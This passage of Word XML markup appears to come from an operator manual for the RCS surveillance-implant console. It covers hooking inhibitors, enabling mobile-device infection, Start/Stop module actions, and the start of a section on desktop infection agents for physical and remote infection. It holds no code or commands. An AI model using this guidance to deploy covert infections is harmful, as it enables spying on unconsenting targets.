              <w:t xml:space="preserve"> ] inhibits program hooking when potentially dangerous processes are running.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C93347" w:rsidRPr="00C93347" w:rsidRDefault="00C93347" w:rsidP="00C93347">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="008E64B2" w:rsidRPr="00C93347" w:rsidRDefault="008E64B2" w:rsidP="00C93347">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="003B3135" w:rsidRPr="00C93347">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Inhibitors</w:t>
            </w:r>
            <w:r w:rsidRPr="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="008072BC" w:rsidRPr="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(2) is the list of processes that, if running, will prevent hooking.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C93347" w:rsidRPr="00C93347" w:rsidRDefault="00C93347" w:rsidP="00C93347">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="003B3135" w:rsidRPr="00C93347" w:rsidRDefault="001A40A0" w:rsidP="00C93347">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00C93347">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Process</w:t>
            </w:r>
            <w:r w:rsidRPr="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] (1) (2) process to be added to the list.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C93347" w:rsidRDefault="00C93347" w:rsidP="0079037A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C93347" w:rsidRDefault="00C93347">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabella"/>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3"/>
        <w:gridCol w:w="284"/>
        <w:gridCol w:w="4651"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E64B2" w:rsidTr="00C93347">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4693" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C93347" w:rsidRDefault="00C93347" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C93347" w:rsidRDefault="0010013A" w:rsidP="00C93347">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.32</w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C93347" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00C93347" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00C93347" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00C93347" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008E64B2" w:rsidRPr="00A52C9B" w:rsidRDefault="00C93347" w:rsidP="00C93347">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(Infection)</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1149" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:223.55pt;height:86.25pt;z-index:251771904;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId190" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1149" DrawAspect="Content" ObjectID="_1446455371" r:id="rId191"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="008E64B2" w:rsidRDefault="008E64B2" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4651" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="008E64B2" w:rsidRPr="00FD294A" w:rsidRDefault="008E64B2" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="008E64B2" w:rsidRPr="00FD294A" w:rsidRDefault="008E64B2" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="008E64B2" w:rsidRPr="00FD294A" w:rsidRDefault="008E64B2" w:rsidP="008E64B2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FD294A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00FD294A">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Infect mobile devices</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD294A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00574703" w:rsidRPr="00FD294A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>allows to enable mobile phone infection providing a valid mobile Factory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="008E64B2" w:rsidRDefault="008E64B2" w:rsidP="0079037A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004279FF" w:rsidRDefault="004279FF" w:rsidP="0079037A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C7B8A" w:rsidRDefault="007C7B8A" w:rsidP="0079037A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004279FF" w:rsidRPr="008254AB" w:rsidRDefault="00335EBA" w:rsidP="00335EBA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- - - - - - - - - -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004279FF" w:rsidRDefault="004279FF" w:rsidP="0079037A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E64B2" w:rsidRDefault="008E64B2" w:rsidP="0079037A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C7B8A" w:rsidRDefault="007C7B8A" w:rsidP="0079037A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0079037A" w:rsidRDefault="004B1CEA" w:rsidP="0079037A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The interaction between Actions and Modules is done through the connection points “Start” and “Stop”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C09F3" w:rsidRPr="004B1CEA" w:rsidRDefault="000C09F3" w:rsidP="0079037A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Start Action has a green arrow. The Stop Action has a red arrow.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C164D4" w:rsidRPr="004B1CEA" w:rsidRDefault="00C164D4" w:rsidP="0079037A">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C164D4" w:rsidRPr="004B1CEA" w:rsidTr="004B1CEA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4673" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C164D4" w:rsidRPr="004B1CEA" w:rsidRDefault="00C164D4" w:rsidP="00C164D4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B1CEA">
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D3384B7" wp14:editId="3C774FD3">
                  <wp:extent cx="2083569" cy="22572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083569" cy="2257200"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C164D4" w:rsidRPr="004B1CEA" w:rsidRDefault="00C164D4" w:rsidP="0079037A">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4671" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C164D4" w:rsidRPr="004B1CEA" w:rsidRDefault="00C164D4" w:rsidP="00C164D4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B1CEA">
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="483E287E" wp14:editId="13A4579F">
                  <wp:extent cx="2083569" cy="22572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83569" cy="2257200"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C164D4" w:rsidRPr="004B1CEA" w:rsidTr="004B1CEA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4673" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004B1CEA" w:rsidRPr="00057420" w:rsidRDefault="004B1CEA" w:rsidP="004B1CEA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F04B48" w:rsidRDefault="0010013A" w:rsidP="00F04B48">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.33</w:t>
            </w:r>
            <w:r w:rsidR="00F04B48">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F04B48" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00F04B48">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS Console ]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F04B48" w:rsidRDefault="00F04B48" w:rsidP="00F04B48">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C164D4" w:rsidRPr="004B1CEA" w:rsidRDefault="00F04B48" w:rsidP="00F04B48">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>START MODULE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C164D4" w:rsidRPr="004B1CEA" w:rsidRDefault="00C164D4" w:rsidP="0079037A">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4671" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004B1CEA" w:rsidRPr="00057420" w:rsidRDefault="004B1CEA" w:rsidP="004B1CEA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00886FBE" w:rsidRDefault="0010013A" w:rsidP="00886FBE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.34</w:t>
            </w:r>
            <w:r w:rsidR="00886FBE">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00886FBE" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00886FBE">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS Console ]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00886FBE" w:rsidRDefault="00886FBE" w:rsidP="00886FBE">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C164D4" w:rsidRPr="004B1CEA" w:rsidRDefault="00886FBE" w:rsidP="00886FBE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>STOP MODULE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00785BC7" w:rsidRDefault="00785BC7" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00946901" w:rsidRPr="004B1CEA" w:rsidRDefault="00946901" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005037B0" w:rsidRDefault="005037B0" w:rsidP="005037B0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00785BC7" w:rsidRDefault="00785BC7" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sectPr w:rsidR="00785BC7" w:rsidSect="00CE07E2">
          <w:headerReference w:type="default" r:id="rId192"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1418" w:right="1134" w:bottom="1134" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005E4792" w:rsidRDefault="005E4792" w:rsidP="005E4792">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc372642490"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Desktop Infection Agents</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w:rsidR="002D7F2D" w:rsidRDefault="002D7F2D" w:rsidP="002D7F2D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">An Agent allows you to embed a previously configured Factory </w:t>
      </w:r>
      <w:r w:rsidR="003C0FC2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">logic </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">inside </w:t>
      </w:r>
      <w:r w:rsidR="003C0FC2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>final RCS infection vector.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C0FC2" w:rsidRDefault="003C0FC2" w:rsidP="002D7F2D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003C0FC2" w:rsidRPr="002D7F2D" w:rsidRDefault="003C0FC2" w:rsidP="002D7F2D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>There are 6 different types of Agents for Desktop platforms, which allow you to perform physical and remote infections. Before continuing, please be sure to read and fully understand the message below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D7F2D" w:rsidRDefault="002D7F2D" w:rsidP="002D7F2D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002D7F2D" w:rsidRDefault="002D7F2D" w:rsidP="002D7F2D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22C22D2E" wp14:editId="0E4BFCF4">
            <wp:extent cx="3708961" cy="2880000"/>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08961" cy="2880000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D7F2D" w:rsidRPr="002D7F2D" w:rsidRDefault="002D7F2D" w:rsidP="002D7F2D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:highlight w:val="red"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002D7F2D" w:rsidRDefault="0010013A" w:rsidP="002D7F2D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5.1</w:t>
      </w:r>
      <w:r w:rsidR="002D7F2D" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [ RCS Console ] Operations &gt; </w:t>
      </w:r>
      <w:r w:rsidR="002D7F2D" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Operation #</w:t>
      </w:r>
      <w:r w:rsidR="002D7F2D" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="002D7F2D" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Target #</w:t>
      </w:r>
      <w:r w:rsidR="002D7F2D" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="002D7F2D" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Factory #</w:t>
      </w:r>
      <w:r w:rsidR="002D7F2D" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; Build</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D7F2D" w:rsidRDefault="002D7F2D" w:rsidP="002D7F2D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002D7F2D" w:rsidRDefault="002D7F2D" w:rsidP="00163021">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
